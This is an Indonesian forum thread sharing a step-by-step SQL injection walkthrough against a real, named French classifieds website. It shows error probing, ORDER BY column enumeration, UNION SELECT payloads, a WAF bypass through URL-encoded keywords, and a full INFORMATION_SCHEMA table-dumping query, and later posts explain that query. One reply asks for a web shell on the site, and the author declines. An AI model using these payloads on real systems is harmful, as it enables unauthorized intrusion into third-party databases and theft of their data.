Posts: 34
Threads: 5
Joined: Mar 2014
Assalamualaikum....Maap Ye bro Kalau Trit Nye Jelek:d
Quote:Ini Mau Share Jawaban Tentang Kuis SQLi Kemarin Yang Saya Buat:d [Kuis]SQLi. Langsung aja yo bro :d
1. Targetnya adalah:
Code: http://www.france-troc.com/annonces/indexc.php?id=397396
dan untuk mengecek error nya tinggal di beri tanda ' dibelakang url dan klik Enter:d
Code: http://www.france-troc.com/annonces/indexc.php?id=397396'
2. Horee...dapeeet error nya\m/
*Ehhh...tapi tunggu kok url nya kembali ke awal yaak
3.Hmmm...coba kembali ke awal lagi dan sekarang coba menggunakan perintah order by dan Enter yak :d
Code: http://www.france-troc.com/annonces/indexc.php?id=397396 order by 1-- -
Daaan...hhmm..ndak kembali ke homepage ternyata...Sekarang tiinggal cari aja deh jumlah column dengan perintah Order by 1-- -, Order by 2-- -,dan seterusnya Disini saya menemukan Error pada
Code: http://www.france-troc.com/annonces/indexc.php?id=397396 order by 8-- -
Dan ndak ada error pada
Code: http://www.france-troc.com/annonces/indexc.php?id=397396 order by 7-- -
Dan...pasti akan kembali ke awal kalau Error ...*Hhhmm :-?..mungkin kesimpulannya gini..kalau Error pasti akan di redirect ke halaman awal *maap bro kesimpulan ngawur \m/
4. Ok dah Lanjut...udah nemu jadi jumlah columnya ada 7..sekarang tinggal nyari angka ajaibnya wae:d dengan perintah UNION SELECT
Code: http://www.france-troc.com/annonces/indexc.php?id=-397396 UNION SELECT 1,2,3,4,5,6,7-- -
Dan Jangan lupa di Enter ya bro...Daaaan hasilnya akan keluar........
*Lhoooo apa ini.....*Hmmm...setelah Googling cukup lama akhirnya saya tau artinya bro...artinya adalah "Anda Dilarang Masuk" :-?....*Hmm...mungkin ini semacam WAF (Web Application Firewall)
5.Sekarang Coba di Bypass yaak
Code: http://www.france-troc.com/annonces/indexc.php?id=-397396 /*!50000UNION*/ SELECT 1,2,3,4,5,6,7-- -
* Dann....masih tetep ndak bisa*Hhhmmm.... :-? Cara bypass WAF ndak Harus make /*!00000 */ ataupun /*!50000 */ Ini mungkin Berguna bro Ini Ya bro
6. Bagaimana cara bypassnya..coba kita Encode U dan S sehingga menjadi begini
Code: http://www.france-troc.com/annonces/indexc.php?id=-397396 %55NION %53ELECT 1,2,3,4,5,6,7-- -
Daaaaan........
*Vooilaaaa Muncul dah angkanya\m/
Mungkin itu aja Full Query ku bisa dilihat disini bro Yang Ini Ya bro
Maap Jika Ada Salah Kata Ya...Wassalam:-bd
Posts: 188
Threads: 14
Joined: Aug 2013
wah mantep om penjelasannya :-bd cuma aku masih bingung dengan arti dari query yang ini aja om..
Quote:(%53ELECT(@x)FROM(%53ELECT(@x:=0x00),(@NR:=0),(%53ELECT(0)FROM(%49NFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=information_schema)AND(0x00)IN(@x:=CONCAT(@x,0x7c,LPAD(@NR:=@NR%2b1,4,0x30),0x7c20,table_name,0x3c62723e))))x)),2,3,4,5,6,7-- -
kalo untuk %53ELECT = itu untuk membypass select nya ya.. begitu juga dengan %49NFORMATION.
nah kalo yang ini apa ya maksudnya om?
Code: (@x:=0x00),(@NR:=0)
CONCAT(@x,0x7c,LPAD(@NR:=@NR+1,4,0x30)
sebelumnya thx buat penjelasaannya ya om.. dan maaf udah banyak tanya :d
Posts: 34
Threads: 5
Joined: Mar 2014
(04-29-2014, 08:21 AM)Track-R Wrote: wah mantep om penjelasannya :-bd cuma aku masih bingung dengan arti dari query yang ini aja om..
Quote:(%53ELECT(@x)FROM(%53ELECT(@x:=0x00),(@NR:=0),(%53ELECT(0)FROM(%49NFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=information_schema)AND(0x00)IN(@x:=CONCAT(@x,0x7c,LPAD(@NR:=@NR%2b1,4,0x30),0x7c20,table_name,0x3c62723e))))x)),2,3,4,5,6,7-- -
kalo untuk %53ELECT = itu untuk membypass select nya ya.. begitu juga dengan %49NFORMATION.
nah kalo yang ini apa ya maksudnya om?
Code: (@x:=0x00),(@NR:=0)
CONCAT(@x,0x7c,LPAD(@NR:=@NR+1,4,0x30)
sebelumnya thx buat penjelasaannya ya om.. dan maaf udah banyak tanya :d
Hehehehe..oke dah mas..dari ini aja
Code: CONCAT(@x,0x7c,LPAD(@NR:=@NR%2b1,4,0x30),0x7c20,table_name,0x3c62723e))))x)),
LPAD()
menggabungkan suatu karakter ke dalam string sebanyak jumlah maksimal bilangan yang disebutkan...Lebih Lengkapnya smpean baca disni
Quote:
@NR:=@NR%2b1,4,0x30)
@NR => Disini digunakan untuk menmbhkan nomor..(numbering)
%2b => tanda +
1,4,0x30 =>jadi ini mksudnya dimulai dari angka satu dan terdapat 4 digit dri penomoran tsb
0x30 => angka 0
Maaf ye mas kalau kurang jelas:d Sekian:d
Posts: 929
Threads: 141
Joined: Jul 2011
keeeeerrrrrrrrrrrrrreeeeeeeeeeeeeeeeennnnnnnnnnnnnn bro
ahahha
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
Posts: 188
Threads: 14
Joined: Aug 2013
(04-29-2014, 02:20 PM)G_26 Wrote: Hehehehe..oke dah mas..dari ini aja
Code: CONCAT(@x,0x7c,LPAD(@NR:=@NR%2b1,4,0x30),0x7c20,table_name,0x3c62723e))))x)),
LPAD()
menggabungkan suatu karakter ke dalam string sebanyak jumlah maksimal bilangan yang disebutkan...Lebih Lengkapnya smpean baca disni
Quote:- /doc/refman/5.0/en/string-functions.html
- /mysql/string-functions/mysql-lpad-function.php
- /content.php?refid=41
@NR:=@NR%2b1,4,0x30)
@NR => Disini digunakan untuk menmbhkan nomor..(numbering)
%2b => tanda +
1,4,0x30 =>jadi ini mksudnya dimulai dari angka satu dan terdapat 4 digit dri penomoran tsb
0x30 => angka 0
Maaf ye mas kalau kurang jelas:d Sekian:d
wah oke oke.. terima kasih mas buat penjelasannya mas..
detail banget mas.. :-bd
Posts: 165
Threads: 1
Joined: Oct 2012
(04-29-2014, 03:23 AM)G_26 Wrote:
Assalamualaikum....Maap Ye bro Kalau Trit Nye Jelek:d
Quote:Ini Mau Share Jawaban Tentang Kuis SQLi Kemarin Yang Saya Buat:d [Kuis]SQLi. Langsung aja yo bro :d
1. Targetnya adalah:
Code: /annonces/indexc.php?id=397396
dan untuk mengecek error nya tinggal di beri tanda ' dibelakang url dan klik Enter:d
Code: /annonces/indexc.php?id=397396'
2. Horee...dapeeet error nya\m/
*Ehhh...tapi tunggu kok url nya kembali ke awal yaak
3.Hmmm...coba kembali ke awal lagi dan sekarang coba menggunakan perintah order by dan Enter yak :d
Code: /annonces/indexc.php?id=397396 order by 1-- -
Daaan...hhmm..ndak kembali ke homepage ternyata...Sekarang tiinggal cari aja deh jumlah column dengan perintah Order by 1-- -, Order by 2-- -,dan seterusnya Disini saya menemukan Error pada
Code: /annonces/indexc.php?id=397396 order by 8-- -
Dan ndak ada error pada
Code: /annonces/indexc.php?id=397396 order by 7-- -
Dan...pasti akan kembali ke awal kalau Error ...*Hhhmm :-?..mungkin kesimpulannya gini..kalau Error pasti akan di redirect ke halaman awal *maap bro kesimpulan ngawur \m/
4. Ok dah Lanjut...udah nemu jadi jumlah columnya ada 7..sekarang tinggal nyari angka ajaibnya wae:d dengan perintah UNION SELECT
Code: /annonces/indexc.php?id=-397396 UNION SELECT 1,2,3,4,5,6,7-- -
Dan Jangan lupa di Enter ya bro...Daaaan hasilnya akan keluar........
*Lhoooo apa ini.....*Hmmm...setelah Googling cukup lama akhirnya saya tau artinya bro...artinya adalah "Anda Dilarang Masuk" :-?....*Hmm...mungkin ini semacam WAF (Web Application Firewall)
5.Sekarang Coba di Bypass yaak
Code: /annonces/indexc.php?id=-397396 /*!50000UNION*/ SELECT 1,2,3,4,5,6,7-- -
* Dann....masih tetep ndak bisa*Hhhmmm.... :-? Cara bypass WAF ndak Harus make /*!00000 */ ataupun /*!50000 */ Ini mungkin Berguna bro Ini Ya bro
6. Bagaimana cara bypassnya..coba kita Encode U dan S sehingga menjadi begini
Code: /annonces/indexc.php?id=-397396 %55NION %53ELECT 1,2,3,4,5,6,7-- -
Daaaaan........
*Vooilaaaa Muncul dah angkanya\m/
Mungkin itu aja Full Query ku bisa dilihat disini bro Yang Ini Ya bro
Maap Jika Ada Salah Kata Ya...Wassalam:-bd
di tunggu shell nya bro \m/
Posts: 34
Threads: 5
Joined: Mar 2014
(04-30-2014, 11:54 AM)EKO_X Wrote: (04-29-2014, 03:23 AM)G_26 Wrote:
Assalamualaikum....Maap Ye bro Kalau Trit Nye Jelek:d
Quote:Ini Mau Share Jawaban Tentang Kuis SQLi Kemarin Yang Saya Buat:d [Kuis]SQLi. Langsung aja yo bro :d
1. Targetnya adalah:
Code: /annonces/indexc.php?id=397396
dan untuk mengecek error nya tinggal di beri tanda ' dibelakang url dan klik Enter:d
Code: /annonces/indexc.php?id=397396'
2. Horee...dapeeet error nya\m/
*Ehhh...tapi tunggu kok url nya kembali ke awal yaak
3.Hmmm...coba kembali ke awal lagi dan sekarang coba menggunakan perintah order by dan Enter yak :d
Code: /annonces/indexc.php?id=397396 order by 1-- -
Daaan...hhmm..ndak kembali ke homepage ternyata...Sekarang tiinggal cari aja deh jumlah column dengan perintah Order by 1-- -, Order by 2-- -,dan seterusnya Disini saya menemukan Error pada
Code: /annonces/indexc.php?id=397396 order by 8-- -
Dan ndak ada error pada
Code: /annonces/indexc.php?id=397396 order by 7-- -
Dan...pasti akan kembali ke awal kalau Error ...*Hhhmm :-?..mungkin kesimpulannya gini..kalau Error pasti akan di redirect ke halaman awal *maap bro kesimpulan ngawur \m/
4. Ok dah Lanjut...udah nemu jadi jumlah columnya ada 7..sekarang tinggal nyari angka ajaibnya wae:d dengan perintah UNION SELECT
Code: /annonces/indexc.php?id=-397396 UNION SELECT 1,2,3,4,5,6,7-- -
Dan Jangan lupa di Enter ya bro...Daaaan hasilnya akan keluar........
*Lhoooo apa ini.....*Hmmm...setelah Googling cukup lama akhirnya saya tau artinya bro...artinya adalah "Anda Dilarang Masuk" :-?....*Hmm...mungkin ini semacam WAF (Web Application Firewall)
5.Sekarang Coba di Bypass yaak
Code: /annonces/indexc.php?id=-397396 /*!50000UNION*/ SELECT 1,2,3,4,5,6,7-- -
* Dann....masih tetep ndak bisa*Hhhmmm.... :-? Cara bypass WAF ndak Harus make /*!00000 */ ataupun /*!50000 */ Ini mungkin Berguna bro Ini Ya bro
6. Bagaimana cara bypassnya..coba kita Encode U dan S sehingga menjadi begini
Code: /annonces/indexc.php?id=-397396 %55NION %53ELECT 1,2,3,4,5,6,7-- -
Daaaaan........
*Vooilaaaa Muncul dah angkanya\m/
Mungkin itu aja Full Query ku bisa dilihat disini bro Yang Ini Ya bro
Maap Jika Ada Salah Kata Ya...Wassalam:-bd
di tunggu shell nya bro \m/
Wew...ndak main gtuan om:d
Posts: 165
Threads: 1
Joined: Oct 2012
(04-30-2014, 05:52 PM)G_26 Wrote: (04-30-2014, 11:54 AM)EKO_X Wrote: (04-29-2014, 03:23 AM)G_26 Wrote:
Assalamualaikum....Maap Ye bro Kalau Trit Nye Jelek:d
Quote:Ini Mau Share Jawaban Tentang Kuis SQLi Kemarin Yang Saya Buat:d [Kuis]SQLi. Langsung aja yo bro :d
1. Targetnya adalah:
Code: /annonces/indexc.php?id=397396
dan untuk mengecek error nya tinggal di beri tanda ' dibelakang url dan klik Enter:d
Code: /annonces/indexc.php?id=397396'
2. Horee...dapeeet error nya\m/
*Ehhh...tapi tunggu kok url nya kembali ke awal yaak
3.Hmmm...coba kembali ke awal lagi dan sekarang coba menggunakan perintah order by dan Enter yak :d
Code: /annonces/indexc.php?id=397396 order by 1-- -
Daaan...hhmm..ndak kembali ke homepage ternyata...Sekarang tiinggal cari aja deh jumlah column dengan perintah Order by 1-- -, Order by 2-- -,dan seterusnya Disini saya menemukan Error pada
Code: /annonces/indexc.php?id=397396 order by 8-- -
Dan ndak ada error pada
Code: /annonces/indexc.php?id=397396 order by 7-- -
Dan...pasti akan kembali ke awal kalau Error ...*Hhhmm :-?..mungkin kesimpulannya gini..kalau Error pasti akan di redirect ke halaman awal *maap bro kesimpulan ngawur \m/
4. Ok dah Lanjut...udah nemu jadi jumlah columnya ada 7..sekarang tinggal nyari angka ajaibnya wae:d dengan perintah UNION SELECT
Code: /annonces/indexc.php?id=-397396 UNION SELECT 1,2,3,4,5,6,7-- -
Dan Jangan lupa di Enter ya bro...Daaaan hasilnya akan keluar........
*Lhoooo apa ini.....*Hmmm...setelah Googling cukup lama akhirnya saya tau artinya bro...artinya adalah "Anda Dilarang Masuk" :-?....*Hmm...mungkin ini semacam WAF (Web Application Firewall)
5.Sekarang Coba di Bypass yaak
Code: /annonces/indexc.php?id=-397396 /*!50000UNION*/ SELECT 1,2,3,4,5,6,7-- -
* Dann....masih tetep ndak bisa*Hhhmmm.... :-? Cara bypass WAF ndak Harus make /*!00000 */ ataupun /*!50000 */ Ini mungkin Berguna bro Ini Ya bro
6. Bagaimana cara bypassnya..coba kita Encode U dan S sehingga menjadi begini
Code: /annonces/indexc.php?id=-397396 %55NION %53ELECT 1,2,3,4,5,6,7-- -
Daaaaan........
*Vooilaaaa Muncul dah angkanya\m/
Mungkin itu aja Full Query ku bisa dilihat disini bro Yang Ini Ya bro
Maap Jika Ada Salah Kata Ya...Wassalam:-bd
di tunggu shell nya bro \m/
Wew...ndak main gtuan om:d %55NION <-- maksud nya apa?
Posts: 34
Threads: 5
Joined: Mar 2014
(04-30-2014, 05:55 PM)EKO_X Wrote: (04-30-2014, 05:52 PM)G_26 Wrote: (04-30-2014, 11:54 AM)EKO_X Wrote: (04-29-2014, 03:23 AM)G_26 Wrote:
Assalamualaikum....Maap Ye bro Kalau Trit Nye Jelek:d
Quote:Ini Mau Share Jawaban Tentang Kuis SQLi Kemarin Yang Saya Buat:d [Kuis]SQLi. Langsung aja yo bro :d
1. Targetnya adalah:
Code: /annonces/indexc.php?id=397396
dan untuk mengecek error nya tinggal di beri tanda ' dibelakang url dan klik Enter:d
Code: /annonces/indexc.php?id=397396'
2. Horee...dapeeet error nya\m/
*Ehhh...tapi tunggu kok url nya kembali ke awal yaak
3.Hmmm...coba kembali ke awal lagi dan sekarang coba menggunakan perintah order by dan Enter yak :d
Code: /annonces/indexc.php?id=397396 order by 1-- -
Daaan...hhmm..ndak kembali ke homepage ternyata...Sekarang tiinggal cari aja deh jumlah column dengan perintah Order by 1-- -, Order by 2-- -,dan seterusnya Disini saya menemukan Error pada
Code: /annonces/indexc.php?id=397396 order by 8-- -
Dan ndak ada error pada
Code: /annonces/indexc.php?id=397396 order by 7-- -
Dan...pasti akan kembali ke awal kalau Error ...*Hhhmm :-?..mungkin kesimpulannya gini..kalau Error pasti akan di redirect ke halaman awal *maap bro kesimpulan ngawur \m/
4. Ok dah Lanjut...udah nemu jadi jumlah columnya ada 7..sekarang tinggal nyari angka ajaibnya wae:d dengan perintah UNION SELECT
Code: /annonces/indexc.php?id=-397396 UNION SELECT 1,2,3,4,5,6,7-- -
Dan Jangan lupa di Enter ya bro...Daaaan hasilnya akan keluar........
*Lhoooo apa ini.....*Hmmm...setelah Googling cukup lama akhirnya saya tau artinya bro...artinya adalah "Anda Dilarang Masuk" :-?....*Hmm...mungkin ini semacam WAF (Web Application Firewall)
5.Sekarang Coba di Bypass yaak
Code: /annonces/indexc.php?id=-397396 /*!50000UNION*/ SELECT 1,2,3,4,5,6,7-- -
* Dann....masih tetep ndak bisa*Hhhmmm.... :-? Cara bypass WAF ndak Harus make /*!00000 */ ataupun /*!50000 */ Ini mungkin Berguna bro Ini Ya bro
6. Bagaimana cara bypassnya..coba kita Encode U dan S sehingga menjadi begini
Code: /annonces/indexc.php?id=-397396 %55NION %53ELECT 1,2,3,4,5,6,7-- -
Daaaaan........
*Vooilaaaa Muncul dah angkanya\m/
Mungkin itu aja Full Query ku bisa dilihat disini bro Yang Ini Ya bro
Maap Jika Ada Salah Kata Ya...Wassalam:-bd
di tunggu shell nya bro \m/
Wew...ndak main gtuan om:d %55NION <-- maksud nya apa?
Di atas kyak e udh ada penjelasan e mas
|